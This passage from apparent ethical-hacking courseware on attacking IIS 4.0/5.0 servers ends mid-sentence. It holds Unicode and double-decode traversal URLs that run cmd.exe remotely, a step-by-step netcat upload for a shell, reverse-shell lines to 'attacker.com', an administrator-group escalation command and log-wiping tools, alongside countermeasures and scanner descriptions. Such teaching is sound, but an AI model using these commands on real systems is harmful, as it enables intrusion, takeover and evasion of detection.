The “global.asa” file is a prime target for attackers, since it is used to specify event scripts and
declare objects that have session or application scope. It is not a content file displayed to the
users; instead, it stores event information and objects used globally by the application. This file
has to be named “global.asa” and has to be stored in the root directory of the application. As a
result, the hackers can easily locate it and use any one of the above exploits to obtain its content.
The file typically contains several functions including “Application_OnStart” which is activated
when a new session starts. In many cases, the code connects to the database and makes the
necessary initialization.
However, in a nutshell, the vulnerability could allow a malicious user to request files from the
server, which would then be processed as though they were .HTR files. The result of this could be
that parts of the .ASP source code would be sent to the malicious user. In theory, this could
expose sensitive data contained in the .ASP files.

Hacking Web Servers
EC-Council
IIS Directory Traversal
The vulnerability results because of a canonicalization
error affecting CGI scripts and ISAPI extensions (.ASP
is probably the best known ISAPI-mapped file type.)
canonicalization is the process by which various
equivalent forms of a name can be resolved to a single,
standard name.
For example, "%c0%af" and "%c1%9c" are overlong
representations for ?/? and ??
Thus, by feeding the HTTP request like the following to
IIS, arbitrary commands can be executed on the server:
GET/scripts/..%c0%af../winnt/system32/cmd.e
xe?/c+dir=c: HTTP/1.0
Due to a canonicalization error in IIS 4.0 and 5.0, a particular type of malformed URL could be
used to access files and folders that lie anywhere on the logical drive that contains the web folders.
This would potentially enable a malicious user who visited the web site to gain additional
privileges on the machine – specifically, it could be used to gain privileges commensurate with
those of a locally logged-on user. Gaining these permissions would enable the malicious user to
add, change or delete data, run code already on the server, or upload new code to the server and
run it. This is the vulnerability exploited by the Code Blue Worm.
Canonicalization
Canonicalization is the process by which various equivalent forms of a name can be resolved to a
single, standard name – the so-called canonical name. For example, on a given machine, the
names c:dirtest.dat, test.dat, and ....test.dat might all refer to the same file. Canonicalization
is the process by which such names would be mapped to a name like c:dirtest.dat.
Vulnerability
When certain types of files are requested via a specially-malformed URL, the canonicalization
yields a partially-correct result. It locates the correct file, but concludes that the file is located in a
different folder than it actually is. As a result, it applies the permissions from the wrong folder.
The vulnerability results because it is possible to construct an URL that would cause IIS to
navigate to any desired folder on the logical drive that contains the web folder structure, and
access files in it. The request would be processed under the security context of the
IUSR_machinename account, which is the anonymous user account for IIS. This is the account
that performs web actions on behalf of unauthenticated visitors to the site. Under normal

Hacking Web Servers
conditions, the account only has permissions to take actions that are acceptable for general use by
visitors to the site.
The danger lies in the fact that the vulnerability allows the user to escape from the web folders
and access files elsewhere on the drive. By default, many of these files provide access to the
Everyone group and/or the Users group, both of which include the IUSR_machinename account
as a member. These groups have execute permissions to most operating system commands, and
this would give the malicious user the ability to cause widespread damage. This vulnerability
would effectively grant the same privileges to the malicious user as are normally available to users
who can log onto a machine locally.
The default permissions would allow the user to execute virtually any operating system command,
and these would enable him to cause a wide array of damage. He could, for instance, create new
files on the server, delete ones that are already there, or he could reformat the entire hard drive.
He wouldn’t be limited to misusing code that already existed on the server. Access to the
operating system commands would give him the ability to upload code of his choice to the
machine and execute it.
However, the vulnerability only allows files to be accessed if they reside on the same logical drive
as the web folders. So, for instance, if a web administrator had configured his server so that the
operating system files were installed on the C: drive and the web folders were installed on the D:
drive, the malicious user would be unable to use the vulnerability to access the operating system
files.
Exploit
One of the principal security functions of a web server is to restrict user requests so they can only
access files within the web folders. Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot
"../" directory traversal exploitation if extended Unicode character representations are used in
substitution for "/" and "". This vulnerability provides a way for a malicious user to provide a
special URL to the web site that will access any files whose name and location he knows, and
which is located on the same logical drive as the web folders. This would potentially enable a
malicious user who visited the web site to gain additional privileges on the machine – specifically,
it could be used to gain privileges commensurate with those of a locally logged-on user. Gaining
these permissions would enable the malicious user to add, change or delete data, run code already
on the server, or upload new code to the server and run it. For instance, consider the following
valid url.
http://target/scripts/..%c1%1c../path/file.ext
Eg.
http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir

Hacking Web Servers
http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
http://target/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
Another exploit described by the Nsfocus Security Team in their post to Bugtraq, demonstrates
how an attacker can execute commands using a redirect on the target host.
• To begin, the attacker copies "....winntsystem32cmd.exe" to
"....interpubscriptscmd1.exe"
• He appends the command to the valid URL.
http://site/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+....winntsystem32
cmd.exe+cmd1.exe
Vulnerable IIS returns: "CGI Error ... 1 file(s) copied."
The specified CGI application does not return a complete set of HTTP headers. Instead it
returns the above error.
• Next the attacker runs "cmd1.exe /c echo abc >aaa & dir & type aaa " along with the URL
to list the directory contents.
http://site/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+abc+>aaa&dir&type+
aaa
Vulnerable IIS returns:
" Directory of c:inetpubscripts
10/25/2000 03:48p <DIR> .
10/25/2000 03:48p <DIR> ..
10/25/2000 03:51p 6 aaa
12/07/1999 05:00a 236,304 cmd1.exe
..
abc
"

Hacking Web Servers
EC-Council
Unicode
ASCII characters for the dots are replaced with
hexadecimal equivalent (%2E).
ASCII characters for the slashes are replaced with
Unicode equivalent (%c0%af).
Unicode 2.0 allows multiple encoding possibilities for
each characters.
Unicode for "/": 2f, c0af, e080af, f08080af,
f8808080af, .....
Overlong Unicode are NOT malformed, but not allowed
by a correct Unicode encoder and decoder.
Maliciously used to bypass filters that only check short
Unicode.
Unicode extensions are installed by default with Microsoft Internet Information Server (IIS)
version 4.0 and 5.0. This is to allow characters that are not used in the English language to be
recognized by web servers. As we know computers just deal with numbers. It stores letters and
other characters by assigning a number for each one. Unicode provides a unique number for every
character. Unicode forms a single character set across all languages. It's a standard 2-byte or 3-
byte character set. The IIS Unicode Exploit allows users to run arbitrary commands on the web
server. IIS servers with the Unicode extensions loaded are vulnerable unless they are running
current patches.
When can this exploit be used?
1. A writeable or executable directory is available; allowing attackers to upload malicious code.
2. A system executable such as cmd.exe is available on the root and doesn't have an access control
list applied to it.
The attack occurs when an attacker sends a malformed URL to a web server that looks something
like this:
1. http://victim/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
If the target has a virtual executable directory (e.g. scripts) located on the same directory of
Windows system, the directory of C: will be revealed. The question mark inserted after cmd.exe
represents a command line argument.
For instance, appending a /c as in the above example, indicates that it carries out the command
specified by the sub ceding string and then terminates. The "+" indicates the space between
arguments. The variable /..%255c..%255c decodes to /.... which translates to a directory traversal.

Hacking Web Servers
This is equivalent to sending a hex value to the server. A common example is %20 which refers to
a space. Using a direct hex interpretation of a directory traversal will be checked by IIS user
access denied.
Still, the exploit occurs because the CGI routine within the web server decodes the address twice.
First CGI filename will be decoded to check if it is an executable file ( e.g. '.exe' or '.com') After the
filename checkup , IIS will run another decode process. So an attacker will send various hex
values of a required character till a suitable value is accepted.
Therefore '..' can be represented by '..%255c' , '..%%35c' etc. After first decoding, '..%255c' is
turned into '..%5c' IIS will take it as legal character string that can pass security checkup. But after
a second decode process, it will be reverted to '..' and the attack succeeds.
2. http://www.somesite.com/../../../../../winnt/repair/sam._
In this case, the web server will just look for the file in the web root directory called
"../../../../../winnt/repair/sam._". The '../' tells the web server to search one directory above, so
here, the web server will look in the document root for a file called winnt/repair/sam. _ . The no.
of '../''s does not matter as long as there are enough of them to traverse back to the root of the file
system (either c: or / on UNIX system)
The IIS Unicode exploit uses the HTTP protocol and malformed URLs to traverse directories and
execute arbitrary commands on the vulnerable web servers. The IIS Unicode exploit uses a
Unicode representation of a directory delimiter (/) to fool IIS. Because the exploit uses http, it
works directly from the address bar of a browser. Because of the non-interactive nature of this
exploit, interactive commands such as ftp & telnet do not work as well.

Hacking Web Servers
EC-Council
IIS Logs
IIS logs all the visits in log files. The log file is located at
<%systemroot%>logfiles
Be careful. If you don't use proxy, then your IP will be
logged.
This command lists the log files:
http://victim.com/scripts/..%c0%af../..%c
0%af../..%c0%af../..%c0%af../..%c0%af../.
.%c0%af../..%c0%af../..%c0%af../winnt/sys
tem32/cmd.exe?/c+dir+C:Winntsystem32Lo
gfilesW3SVC1
Capturing and maintaining log files are critical to the secure administration of a web server.
While it is generally considered that the log does not capture an intrusion till after the request has
been processed, a diligent administrator might couple logging with tools such as urlscan which
will make logging more effective. Here, we will discuss some of the best practices that can be
followed when it comes to IIS logs. The best way to emphasize the value and importance of IIS log
files would be to draw a comparison to a crime scene, such that while handling IIS logs, they must
be treated as if they are evidence already. Coupling IIS logs with other monitoring records such as
Firewall logs, IDS logs, and even TCPDump can lend more credibility in the event of the log being
used for evidence.
The first rule is to configure the IIS logs to record every available field. Gathering information
about Web visitors can help establish the source of an attack - either by linking it to a system or to
a user. The more information that is collected, the better chance there is of pinning down the
perpetrator.
The second rule is to capture events with a proper time stamp. This is because IIS records logs
using UTC time. The accuracy of the UTC time can be ensured only if the local time zone setting is
correct.
The third rule is to ensure continuity in the logs. IIS logs do not register a log entry if the server
does not get any hits in a 24-hour period. This makes the presence of an empty log file ambiguous
as there is no way of telling if the server received no hits, was offline or if the log file was actually
deleted. The simplest workaround would be to use the Task Scheduler and schedule hits. In
general, scheduled requests can indicate that the logging mechanism is functioning properly.
Therefore, if a log file is missing, it is probably because the file was intentionally deleted.

Hacking Web Servers
The fourth rule is to ensure that logs are not modified in any way after they have been originally
recorded. Once a log file is created, it is important to prevent the file from being accessed and
audit any authorized and unauthorized access. One way to achieve this is to move the IIS logs off
the Web server. Additionally, signing and encrypting the logs using PGP or some other public-key
encryption scheme will ensure their authenticity. File signatures are helpful because if a single file
is corrupted, it does not invalidate the rest of the logs. Also, when doing any log file analysis, the
original files must be never worked with. After the log is closed, no one should have permissions
to modify the file contents.

Hacking Web Servers
EC-Council
Hacking Tool: IISxploit.exe
This tool automates directory traversal exploit in IIS
Perhaps the vulnerability that has had the most telling effect after buffer overflow is the file
system traversal vulnerability. What is really appalling is that on a server with more than its fair
share of unrelated security misconfigurations, exploitation of these vulnerabilities can completely
compromise the system.
The two file system traversal exploits that hogged the limelight are the Unicode and the double
decode (sometimes termed superfluous decode) attacks. The Unicode vulnerability was first seen
in the Packetstorm forums in early 2001 and formally developed by Rain Forest Puppy (RFP). In
his exposition of the problem, he notes that “%c0%af and %c1%9c are overlong Unicode
representations for ‘/’ and ‘’. IIS seems to decode Unicode at the wrong instance (after path
checking, rather than before).
If an attacker gives an HTTP request such as the one that follows, arbitrary commands can
be executed on the server:
GET /scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+'c:' HTTP /1.0
Several other “illegal” representations of “/” and “” are feasible as well, including %c1%1c,
%c1%9c, %c1%1c, %c0%9v, %c0%af, %c0%qf, %c1%8s, %c1%9c, and %c1%pc.
IISxploit by greek pirate essentially allows the user to exploit the directory traversal
vulnerability in IIS. The GUI allows the user to key in the target name and also specify a spoofed
IP. The user can then choose to read, download, and delete files on the target machine.

Hacking Web Servers
EC-Council
Hacking Tool: execiis-win32.exe
This tool exploits IIS directory traversal and takes
command from cmd and executes them on the IIS Server
NSFOCUS Security Team reported vulnerability in filename processing of CGI program in MS
IIS4.0/5.0. The CGI filename was decoded twice erroneously. By exploiting this vulnerability, it
was possible for an intruder to run arbitrary system commands. The exploit is possible because
while loading executable CGI program, IIS will decode twice. First, CGI filename will be decoded
to check if it is an executable file (for example, '.exe' or '.com' suffix check-up). On successfully
passing the filename check-up, IIS will run another decode process. Normally, only CGI
parameters should be decoded in this process. However, this time IIS mistakenly decodes both
CGI parameters and the decoded CGI filename. In this way, CGI filename is decoded twice by
error.
With a malformed CGI filename, an attacker can get round IIS filename security check-ups
like '../' or './' check-up. In some cases, attacker can also run arbitrary system command.
For example, a character '' will be encoded to "%5c". And the corresponding code of these 3
characters is: '%' = %25, '5' = %35 and 'c' = %63. Encoding these 3 characters again can result in
%255c, %%35c, %%35%63, %25%35%63 etc. This makes it possible to represent '..' by '..%255c'
and '..%%35c',etc.
After first decoding, '..%255c' is turned into '..%5c'. IIS will take it as a legal character string that
can pass security check-up. But after a second decode process, it will be reverted to '..'. Hence,
attacker can use '..'to do directory traversal and run arbitrary program outside of Web directory.
execiis-win32.exe exploits IIS directory traversal and takes command from cmd.exe and
executes them on the IIS Server.

Hacking Web Servers
EC-Council
Hacking Tool: Unicodeuploader.pl
Unicode upload creator (unicodeloader.pl) works as
follows:
Two files (upload.asp and upload.inc - have them in the
same dir as the PERL script) are built in the webroot (or
any where else) using echo and some conversion strings.
These files allow you to upload any file by simply surfing
with a browser to the server.
1. Find the webroot
2. perl unicodeloader target: 80 'webroot'
3. surf to target/upload.asp and upload nc.exe
4. perl unicodexecute3.pl target: 80 'webroot/nc -l -p 80 -e
cmd.exe'
5. telnet target 80
Above procedure will drop you into the shell on the box.
Unicodeuploader.pl is a perl script written by Roelof Temmingh to exploit the Unicode
vulnerability in windows. There are three components involved in the exploit. Two files
(upload.asp and upload.inc - hosted in the same dir as the PERL script) are built in the webroot
using echo and some conversion strings. These files allow the attacker to upload any file by
simply surfing with a browser to the server.
Typical use: (5 easy steps to a shell)
1. Find the webroot - example: d:webpageroot
2. perl unicodeloader target:80 'd:webpageroot'
3. surf to target/upload.asp and upload nc.exe
4. perl unicodexecute3.pl target:80 'd:webpagerootnc -l -p 80 -e cmd.exe'
5. telnet target 80
The above procedure will invoke a shell on the target without crashing the server. The
attacker can then proceed to upload other malicious code right after nc.exe. This procedure works
well for servers that are tightly firewalled (- as it uses the allowed port 80); servers that are not
allowed to FTP, RCP or TFTP to the Internet.

Hacking Web Servers
EC-Council
Hacking Tool: cmdasp.asp
After uploading nc.exe to the web server, you can
shovel a shell back to your pc.
Shoveling a shell back to the attacker's system is easy:
1. Start a netcat listener on the attacker's system:
c:>nc.exe -l -p 2002
2. Use cmdasp.asp to shovel a netcat shell back to the
listener:
c:inetpubscriptsnc.exe -v -e cmd.exe
attacker.com 2002
The attacker can also choose to extend this exploit by shoveling a shell back to his system.
Shoveling a shell back to the attacker's system is easy:
1. Start a netcat listener on the attacker's system: c:>nc.exe -l -p 2002
2. Use cmdasp.asp to shovel a netcat shell back to the listener: c:inetpubscriptsnc.exe -v -e
cmd.exe attacker.com 2002
CmdAsp.asp - is an interactive ASP page command prompt. It works on IIS web servers that
are vulnerable to the use of the IUSR_COMPUTER and IWAM_COMPUTER user accounts.
These accounts will execute scripts such as ASP or Perl. It is important to note that these accounts
belong to the Everyone group.
In IIS 5, any process started by a wscript.shell object will run in the context of the IWAM_*
account, and can be a point of attack as demonstrated by cmdasp.asp. It runs in the context of the
web server as a standard ASP page and makes a good back door to any IIS web server.
The script assumes that IUSR_COMPUTER can write to the root directory "c:". This is true for
default NT/2000 installs. However, it is not a requirement that this script can write to the file
system to execute commands. It is only a requirement for viewing the piped output of the
commands.
echo OPEN 10.0.2.0 > c:ftp.txt & vol
echo USER anonymous hacked@yourcompany.com >> c:ftp.txt & vol
echo GET myfile >> c:ftp.txt & vol

Hacking Web Servers
echo BYE >> c:ftp.txt & vol
cd c: & ftp -n -s:c:ftp.txt
del c:ftp.txt

Hacking Web Servers
EC-Council
Escalating Privileges on IIS
On IIS 4, the LPC ports can be exploited using hk.exe
hk.exe will run commands using SYSTEM account on
windows pertaining to intruders to simply add the IUSR or
IWAM account to the local administrator's group.
hk.exe net localgroup administrators
IUSR_machinename /add
Note: LPC port vulnerability is patched on IIS 5.0
Applications within Windows are entirely controlled through the use of messages. However, on
Win32 the mechanism for controlling these messages is flawed. Any application on a given
desktop can send a message to any window on the same desktop, regardless of whether or not that
window is owned by the sending application, and regardless of whether the target application
wants to receive those messages.
hk.exe is a program that exploits a vulnerability in the Win32 API( LPC<local procedure call)
that can be used to get system level access net commands(net view, net share, net use, etc)
As hk.exe is a local privilege escalation exploit that runs processes as SYSTEM. Attackers can then
just run netcat via hk.exe, connect to the listener, execute processes with SYSTEM privileges.
For instance, the following command will shovel a shell to attacker:port. Note that hk only works
on NT4.
hk nc -d -e cmd.exe attacker:port

Hacking Web Servers
EC-Council
Hacking Tool: iiscrack.dll
iiscrack.dll works like upload.asp and cmd.asp.
iiscrack.dll provides a form- based input for attackers to
enter commands to be run with SYSTEM privileges.
An attacker could rename iiscrack.dll to idq.dll, upload
the trojan DLL to c:inetpubscripts using
upload.asp and execute it via the web browser using:
http://victim.com/scripts/idq.dll
The attacker now has the option to run virtually any
command as SYSTEM
A privilege elevation vulnerability arisese because of a flaw in a table that IIS 5.0 consults when
determining whether a process should in-process or out-of-process. IIS supports three different
modes of process isolation. These modes control how well the IIS process is isolated from the
processes that are being invoked as part of the request processing.
IIS 5.0 contains a table that lists the system files that should always run in-process. The
vulnerability results because the list that specifies the names does so using relative paths as well
as absolute paths. This use of relative paths means that if an executable having the same name as
one on the list were uploaded to any folder on the server and executed, it would run in process.
Once this occurred, the executable could, by definition, gain system privileges.
Due to a weakness in IIS, several dll files were always executed by the least secure isolation level
regardless of the actual process isolation settings. By adding or replacing one of these dlls with a
malicious version, an attacker could run arbitrary code with SYSTEM privileges. On a
misconfigured server, if an attacker is able to load a program of his choice and execute it, the code
would be able to gain system privileges. This would give the attacker complete control of the
server. He could do anything he wished, from modifying web pages, to reconfiguring the server, to
reformatting the hard drive.
One way of doing this would be to use iiscrack.dll which works like upload.asp and cmd.asp.
iiscrack.dll provides a form- based input for attackers to enter commands to be run with SYSTEM
privileges. An attacker could rename iiscrack.dll to idq.dll, upload the trojan DLL to
c:inetpubscripts using upload.asp and execute it with the web browser using:
http://victim.com/scripts/idq.dll. The attacker now has the option to run virtually any command
as SYSTEM.

Hacking Web Servers
EC-Council
Hacking Tool: ispc.exe
ISPC.exe is a Win32 client that is used to connect a
trojan ISAPI DLL (idq.dll).
Once the trojan DLL is cpied to the victim webserver
(/sripts/idq.dll), the attacker can execute ispc.exe and
immediately obtain a remote shell running as SYSTEM.
c:>ispc.exe victim.com/scripts/idq.dll
80
This exploit tool is similar to in that it requires inserting a rogue .dll file into a web directory,
recommends the use of either the Unicode or Double Decode exploits in order to accomplish this,
and produces a SYSTEM-level access. It is different in that it has two components: a client file,
ispc.exe, for connecting from the attacker’s machine, and idq.dll (or one of the other in-process
.dll files in the above list/table), a server-side ISAPI program for privilege escalation execution. It
is also different in that it is executed from a command prompt at the attacker’s machine, rather
than from a browser.
This software makes use of the IIS 5.0 + SP0 (SP1, SP2) privilege checking hole to obtain
SYSTEM privilege; all that is needed is to upload idq.dll to an executable directory of IIS, to
obtain SYSTEM privilege.
Usage:
First use the UNICODE or double decoding hole to upload idq.dll to an executable directory, for
example /scripts, and then use ispc.exe to connect:
C:>ispc 127.0.0.1/scripts/idq.dll
C:WINNTsystem32>
The cmd.exe thus obtained has SYSTEM privileges.
1. After you've uploaded idq.dll to an IIS executable directory, it must be called one of the
following: idq.dll / httpext.dll / httpodbc.dll / ssinc.dll / msw3prt.dll / author.dll /
Admin.dll / shtml.dll / sspifilt.dll / compfilt.dll / pwsdata.dll / md5filt.dll / fpexedll.dll

Hacking Web Servers
If another name is used, then there's no way to obtain SYSTEM privilege.
2. After you've finished entering a command, you must hit carriage return three times, to get a
prompt back.
3. SP3 is not affected by this hole.

Hacking Web Servers
EC-Council
Unspecified Executable Path
Vulnerability
When executables and DLL files are not preceded by a
path in the registry (eg. explorer.exe does not have a fixed
path by default).
Windows NT 4.0 / 2000 will search for the file in the
following locations in this order:
• the directory from which the application loaded.
• the current directory of the parent process,
• ...system32
• ...system
• the windows directory
• the directories specified in the PATH environment
variable
The registry entry that specifies the Windows Shell executable (Explorer.exe) provides a relative,
rather than absolute, path name. When executables and DLL files are not preceded by a path in
the registry (eg. explorer.exe does not have a fixed path by default), Windows NT 4.0 / 2000 will
search for the file in the following locations in this order: the directory from which the application
loaded. The current directory of the parent process ...System32, ...System, the Windows
directory, the directories specified in the PATH environment variable
The Windows Shell is the familiar desktop that’s used for interacting with Windows. During
system startup, Windows NT 4.0 and Windows 2000 consult the “Shell” registry entry,
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonShe
ll, to determine the name of the executable that should be loaded as the Shell. By default, this
value specifies Explorer.exe.
This may open up the possibility of automatic execution of Trojans if they are renamed as
executables that do not have a path specified. If we use the example of explorer.exe, a Trojan
named as such could be written to the root directory. At system startup time, the normal search
order would cause any file named Explorer.exe in the %Systemdrive% directory to be loaded in
place of the bona fide version. This could provide an opportunity for a malicious user to cause
code of his choice to run when another user subsequently logged onto the same machine. Remote
exploitation is feasible if the root directory is accessible through a share or if a malicious user
were to implant the Trojan onto the root directory through other means.

Hacking Web Servers
EC-Council
Hacking Tool: CleanIISLog
This tool clears the log entries in the IIS log files filtered
by IP address.
An attacker can easily cover his trace by removing
entries based on his IP address in W3SVC Log Files.
This tool clears the log entries in the IIS log files filtered by IP address. An attacker can easily
cover his trace by removing entries based on his IP address in W3SVC Log Files.

Hacking Web Servers
EC-Council
File System Traversal Counter
measures
Microsoft recommends setting the NTFS ACLS on
cmd.exe and several other powerful executables to
Administration and SYSTEM: Full Control only.
Remove executable permission to IUSR account.
This should stop directory traversal in IIS.
Apply Microsoft patches and Hotfixes regularly.
File System Traversal Countermeasures as recommended by Microsoft Corporation:
Recommends setting the NTFS ACLS on cmd.exe and several other powerful executables to
Administration and SYSTEM: Full Control only. It is advised that the executable permission to
IUSR account be removed. This should stop directory traversal in IIS. It is also necessary that the
Microsoft patches and Hot fixes regularly be applied on a regular basis.

Hacking Web Servers
EC-Council
Solution: UpdateExpert
Update Expert is a Windows administration program that
helps you secure your systems by remotely managing
service packs and hot fixes.
Microsoft constantly releases updates for the OS and
mission critical applications, which fix security
vulnerabilities and system stability problems.
UpdateExpert enhances security, keeps systems up to
date, eliminates sneaker-net, improves system reliability
and QoS
UpdateEXPERT is a hotfix and service pack security management utility that helps systems
administrators keep their hotfixes and service packs up-to-date by analyzing which service packs
and hotfixes are installed on the Windows 2000/NT and Terminal Server machines on their
network, which ones are not installed and which ones are available. UpdateEXPERT facilitates
locating, downloading and installing the latest service packs and hotfixes. UpdateExpert
eliminates the confusion and labor of maintaining hotfixes.

Hacking Web Servers
The goal is to eliminate the need to go to Microsoft's Knowledgebase site for hotfixes and service
packs. UpdateEXPERTs team of specialists comb through various download sites for updates
every hour; they also check for new categories. UpdateEXPERT has the most categories for these
updates in the industry. This exclusive feature makes it easy to find any group of updates
instantly.
When new updates or changes to the database are discovered, UpdateEXPERT specialists test the
article link; download link, inventory parameters, validation parameters and installation
parameters. Then, they test the deployment to ensure that the installation parameters are correct.
The efficacy and the performance of the update are not tested. Once it is confirmed the
installation is complete, the testing is stopped.

Hacking Web Servers
EC-Council
cacls.exe utility
Built-in Windows 2000 utility (cacls.exe) can set access control list
(ACLs) permissions globally.
Let's say you want to change permissions on all executable files to
System:Full, Administrators:Full,
C:>cacls.exe c:myfolder*.exe /T /G
System:F Administrators:F
Cacls.exe is a Windows NT/2000/XP command-line tool that can be used to assign, display, or
modify ACLs (access control lists) to files or folders. Cacls is an interactive tool, and since it's a
command-line utility, it can also be used in batch files. Cacls can also be used in conjunction with
other command-line tools. Used with other administration tools, Cacls will make it much easier to
handle administrative tasks performed in large environments.
The usage of Cacls is from the command line for single tasks or within a batch file for multiple
operations. The default location of Cacls.exe is in the %SystemRoot%System32 folder for all
installations of Windows NT, 2000, and XP and requires the NTFS file system. Cacls also allows
for the use of wildcards, variables, and multiple permissions or users per line. Cacls usage is
similar across all Windows versions, which eases the learning curve across new releases of
Windows. To see the Cacls options, start a command prompt, and type cacls. This will show a list
of options and parameters. The simplest operation that Cacls can perform is to display the ACLs
of a file or folder with a command such as: cacls c:folderfile.txt
Operation Parameter
Change ACLs of specified files in current folder and all subfolders /T
Edit ACL instead of replacing it /E
Continue on access-denied errors /C
Grant specified user access rights;
Permissions are Read (R), Write (W), Change (C), Full Control (F)
/G user:perm
Revoke ACLs /R user
Replace specified user’s access rights;
Permissions are None (N) and same options from grant operation
/P user:perm
Deny specified user access /D user

Hacking Web Servers
The primary purpose of whisker 2.0 is to be a CGI scanner, which is used to search for known
vulnerable CGIs on websites. Whisker does this by both scanning the CGIs directly as well as
crawling the website in order to determine what CGIs are already currently in use.
Whisker is an excellent CGI scanner. Whisker has the capability to not only check for CGI
vulnerabilities but do so in an evasive manner, so as to elude intrusion detection systems. It
comes with excellent documentation which should be carefully reviewed prior to running the
program. When you have found your Web servers serving up CGI scripts, Whisker can be an
excellent resource for checking the security of these servers.
Whisker popularized Web vulnerability scanning with its Perl implementation, which made
extending the URL database easy. In fact, its most under-used capability is its ability to be run as
a CGI script simply by placing it in the /cgi-bin/ on your Web server. Whisker is best used as a
URL scanner. It identifies Web pages with known security problems or those pages that should be
removed to make a clean Web document root. It can also perform brute force attacks against sites
using HTTP Basic Authentication.
A current version of Whisker also has the capability to scan servers over SSL, but the scanner
suffers the drawback of being primarily a URL checker. If it doesn't find a page, it reports it to the
user, but vulnerability checks for recent IIS bugs such as the Unicode or Double Decode directory
traversal or Netscape's PageServices bug are not in this version.

Hacking Web Servers
EC-Council
Network Tool: Stealth HTTP Scanner
http://www
nstalker.com/nstealth/
N-Stealth 5 is an impressive
Web vulnerability scanner that
scans over 18000 HTTP
security issues.
Stealth HTTP Scanner writes
scan results to an easy HTML
report.
N-Stealth is often used by
security companies for
penetration testing and system
auditing, specifically for testing
Web servers.
N-Stealth® 5.0 is a vulnerability-assessment product that scans web servers to identify
security problems and weaknesses that might allow an attacker to gain privileged access. The
software comes with an extensive database of over 25,000 vulnerabilities and exploits. N-Stealth
is more actively maintained than the network security scanners and consequently has a larger
database of vulnerabilities.
N-Stealth® is a comprehensive web server security-auditing tool that scans for over 25,000
vulnerabilities. It is ideal for system administrators, security consultant and IT professionals. The
software's wide array of scanning techniques and extensive security-hole database make it the
best available program for locking down web servers. N-Stealth® can audit both local and remote
web servers. The program runs on Windows 95/98/ME/NT/2K or XP.
Standard Scan Method
This method will scan the web server using a set of well-known directories, including script and
source directories. The main difference is that N-Stealth will not try to identify remote directories
on the target's web server. This option will always generate a static rules baseline.
It is recommended for standard deployed web servers and for faster security checks.
Complete Scan Method
This method will scan the web server to identify remote directories and it will use this information
to generate a custom rules baseline. By combining different signatures to an unpredictable set of
discovered directories, this method may produce a small number of security checks (less than the

Hacking Web Servers
standard method) to a large amount of security checks (more than 300,000 for customized web
servers). It is recommended for non-standard web servers.
Top10 Scan Method
This method will scan the web server for the top 10 vulnerabilities list published by SANS/FBI
(www.sans.org). It is a very fast security check but it will certainly produce superficial results.
It is recommended for brief security checks.
Top20 Scan Method
This method will scan the web server for the top 20 vulnerabilities list published by SANS/FBI
(www.sans.org). It is a very fast security check but it will certainly produce superficial results.
It is recommended for brief security checks.

Hacking Web Servers
EC-Council
Hacking Tool: WebInspect
WebInspect is an impressive Web server and
application-level vulnerability scanner which scans over
1500 known attacks.
It checks site contents and analyzes for rudimentary
application-issues like smart guesswork checks,
password guessing, parameter passing, and hidden
parameter checks.
It can analyze a basic Webserver in 4 minutes
cataloging over 1500 HTML pages.
WebInspect is an impressive Web server and application-level vulnerability scanner which
scans over 1500 known attacks. It checks site contents and analyzes for rudimentary application-
issues like smart guesswork checks, password guessing, parameter passing, and hidden parameter
checks. It can analyze a basic Webserver in 4 minutes cataloging over 1500 HTML pages.
WebInspect enables application and web services developers to automate the discovery of security
vulnerabilities as they build applications, access detailed steps for remediation of those
vulnerabilities and deliver secure code for final quality assurance testing. Early discovery and
remediation of security vulnerabilities reduces the overall cost of secure application deployment,
improving both application ROI and overall organizational security.
WebInspect delivers the latest security vulnerabilities and assessment technology with the simple
click of a button. Smart Update is available online and can be accessed before each assessment 24
hours a day, 7 days a week.
With WebInspect, the developer can find and correct vulnerabilities at their source, before
attackers can exploit them. The effectiveness of traditional firewalls and IDS systems stops at the
network level. WebInspect complements these network assessment and protection tools by
providing the technology necessary to identify vulnerabilities at the next level, the Web
application.

Hacking Web Servers
EC-Council
Network Tool: Shadow Security
Scanner
http://www.safety-lab.com
Security scanner is designed to identify known and
unknown vulnerabilities, suggest fixes to identified
vulnerabilities, and report possible security holes within a
network's internet, intranet and extranet environments.
Shadow Security Scanner includes vulnerability auditing
modules for many systems and services.
These include NetBIOS, HTTP, CGI and WinCGI, FTP,
DNS, DoS vulnerabilities, POP3, SMTP,LDAP,TCP/IP,
UDP, Registry, Services, Users and accounts, Password
vulnerabilities, publishing extensions, MSSQL,IBM
DB2,Oracle,MySQL, PostgressSQL, Interbase, MiniSQL
and more.
Security scanner is designed to identify known and unknown vulnerabilities, suggest fixes to
identified vulnerabilities, and report possible security holes within a network's internet, intranet
and extranet environments. Shadow Security Scanner includes vulnerability auditing modules for
many systems and services.
These include NetBIOS, HTTP, CGI and WinCGI, FTP, DNS, DoS vulnerabilities, POP3, SMTP,
LDAP, TCP/IP, UDP, Registry, Services, Users and accounts, Password vulnerabilities, publishing
extensions, MSSQL, IBM DB2, Oracle, MySQL, PostgressSQL, Interbase, MiniSQL and more.
Running on its native Windows platform, SSS also scans servers built practically on any platform,
successfully revealing breaches in Unix, Linux, FreeBSD, OpenBSD, Net BSD, Solaris and, of
course, Windows 95/98/ME/NT/2000/XP/.NET. Because of its unique architecture, SSS is the
able to detect faults with CISCO, HP, and other network equipment. It is also capable of tracking
more than 2,000 audits per system.
As SSS provides a direct access to its core, it is advisable to use the API to gain full control to SSS
or to change its properties and functions. The BaseSDK wizard will guide through the whole
process of new audit creation. BaseSDK also lets add more than 95% of new audit types.
The Rules and Settings Editor will be essential for the users willing only to scan the desired ports
and services without wasting time and resources on scanning other services. Flexible tuning lets
